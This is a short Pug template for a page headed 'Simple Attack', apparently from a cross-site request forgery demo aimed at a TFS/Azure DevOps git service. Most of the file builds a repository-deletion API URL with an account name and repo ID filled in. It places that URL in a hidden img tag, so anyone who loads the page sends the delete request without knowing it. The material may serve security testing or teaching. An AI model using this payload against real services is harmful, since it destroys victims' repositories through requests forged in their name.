extends ../layout

block content
  include base-attack-nav
  script(src='/js/lib/jquery-3.1.1.min.js')
  .page-header
    h3 Simple Attack

  h2 Some dummy content
  div.csrfContainer hello 
  -
    var deleteRepoWithId = simpleAttackRepoId;
    var repoDeletionUrl = "https://{accountName}.me.tfsallin.net:444/_apis/git/Repositories2/{repoId}?deleteRepositoryId={repoId}";
    repoDeletionUrl = repoDeletionUrl.replace(/{repoId}/g, deleteRepoWithId);
    repoDeletionUrl = repoDeletionUrl.replace(/{accountName}/, accountName);
  img.csrf-image(src=repoDeletionUrl)
  





